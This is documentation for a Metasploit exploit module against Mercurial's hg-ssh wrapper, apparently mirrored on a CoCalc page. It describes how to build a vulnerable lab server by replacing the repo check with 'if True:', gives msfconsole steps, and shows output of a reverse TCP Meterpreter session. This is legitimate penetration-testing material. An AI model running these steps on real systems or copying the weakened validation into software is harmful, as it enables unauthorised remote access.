CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md
Views: 1904

Vulnerable Application

mercurial.

This module was successfully tested against:

  • Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)

Vulnerable Server Setup Steps

  1. Install mercurial on your test server

  2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper vi $(which hg-ssh)

    • Replace if repo in allowed paths: with if True:

    • Replace cmd = ['-R', repo, 'serve', 'stdio'] with cmd = ['-R', path, 'serve', 'stdio']

  3. Setup a user with SSH pubkey auth

  4. Create a test repo in the users home directory and add a commit

    • mkdir -p repos/repo1

    • cd repos/repo1

    • echo "hello world" > README

    • hg add README

    • hg commit -m "Adds README"

  5. Restrict user in authorized_keys to hg-ssh binary only

    • command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY

  6. Verify SSH user can authenticate (should prompt and prevent a shell)

  7. Verify SSH user commands are not allows (should prevent arbitrary commands)

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/linux/ssh/mercurial_ssh_exec

  3. Do: set RHOST <ip>

  4. Do: set LHOST <ip>

  5. Do: set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa

  6. Do: exploit

  7. You should get a shell.

Scenarios

Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)

msf exploit(mercurial_ssh_exec) > exploit

[*] Started reverse TCP handler on 192.168.10.37:4444 
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
[+] 192.168.10.99:22 - SSH connection is established.
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
[*] Sending stage (39842 bytes) to 192.168.10.99
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400